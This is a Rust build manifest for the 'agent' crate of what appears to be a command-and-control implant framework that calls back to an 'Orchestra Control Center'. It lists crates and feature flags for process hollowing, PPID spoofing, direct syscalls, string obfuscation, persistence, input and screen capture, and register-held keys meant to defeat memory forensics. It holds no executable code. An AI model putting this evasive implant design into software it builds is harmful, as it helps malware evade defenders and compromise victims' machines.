[package]
name = "agent"
version.workspace = true
edition.workspace = true
license.workspace = true

[dependencies]
junk_macro = { path = "../junk_macro" }
pe_resolve = { path = "../pe_resolve" }
string_crypt = { path = "../string_crypt" }
common = { path = "../common" }
log = "0.4"
tokio = { workspace = true }
tracing = { workspace = true }
tracing-subscriber = { workspace = true }
sysinfo = { workspace = true }
anyhow = { workspace = true }
portable-pty = "0.9"
dirs = "5.0"
lazy_static = "1.4"
uuid = { version = "1.0", features = ["v4"] }
base64 = { workspace = true }
serde_json = "1.0"
serde = { workspace = true }
module_loader = { path = "../module_loader" }
optimizer = { path = "../optimizer" }
toml = "1.1.2"
directories = "6.0.0"
rustls = { version = "0.23.38", default-features = false, features = ["ring", "std", "logging", "tls12"] }
tokio-rustls = { version = "0.26.4", default-features = false, features = ["ring", "logging", "tls12"] }
rustls-pemfile = "2.2.0"
rustls-native-certs = "0.8"
rcgen = { version = "0.14.7", default-features = false, features = ["crypto", "ring", "pem"] }
rand = "0.8"
libc = "0.2.185"
once_cell = "1.21.4"
zeroize = { version = "1.8.2", features = ["zeroize_derive"] }
chacha20poly1305 = "0.10"

[target.'cfg(target_os = "linux")'.dependencies]
x11cap = { version = "0.1", optional = true }
enigo = { version = "0.2", optional = true, default-features = false, features = ["x11rb"] }
image = { version = "0.25", optional = true }

[target.'cfg(target_os = "macos")'.dependencies]
enigo = { version = "0.2", optional = true }

[target.'cfg(windows)'.dependencies]
enigo = { version = "0.2", optional = true }
windows-capture = { version = "2", optional = true }
winreg = "0.52"
image = { version = "0.25", optional = true }
winapi = { version = "0.3", features = ["debugapi", "processthreadsapi", "memoryapi", "winbase", "winnt", "libloaderapi", "wow64apiset", "handleapi", "iphlpapi", "iptypes", "fileapi", "synchapi", "minwinbase", "tlhelp32"] }
hollowing = { path = "../hollowing" }

[features]
ppid-spoofing = []
stealth = ["direct-syscalls", "unsafe-runtime-rewrite", "memory-guard", "ppid-spoofing"]
dev = []
persistence = []
network-discovery = []
# `dep:x11cap` only resolves when compiling for Linux (see
# `[target.'cfg(target_os = "linux")'.dependencies]`); on Windows it is a
# no-op feature activation because the optional dep is absent from the
# target-specific dependency table.
remote-assist = ["dep:enigo", "dep:image", "dep:x11cap"]
module-signatures = ["common/module-signatures"]
direct-syscalls = []
hci-research = ["dep:rdev", "dep:chrono", "dep:twox-hash"]
# Connect the agent outbound to an Orchestra Control Center instead of waiting
# for an inbound connection from a console. The server address and PSK are
# read from the ORCHESTRA_C / ORCHESTRA_SECRET runtime env vars, or baked in
# at compile time via the ORCHESTRA_C_ADDR / ORCHESTRA_C_SECRET build env vars
# (set automatically by the Builder when outbound-c is included in a profile).
outbound-c = []
unsafe-runtime-rewrite = ["optimizer/unsafe-runtime-rewrite"]
# Encrypt all designated sensitive memory regions while the agent is idle.
# Uses XChaCha20-Poly1305.  The 32-byte key is held in CPU registers (x86-64
# XMM lanes via inline asm) for the duration of the idle window so that a
# memory dump taken while the agent is sleeping reveals only ciphertext.
memory-guard = []

[[bin]]
name = "agent-standalone"
path = "src/main.rs"

[dependencies.rdev]
version = "0.5"
optional = true

[dependencies.chrono]
version = "0.4"
optional = true

[dependencies.twox-hash]
version = "1.6"
optional = true

[dev-dependencies]
criterion = "0.8.2"
rcgen = "0.14.7"
tempfile = "3.27.0"

[[bench]]
name = "agent_benchmark"
harness = false
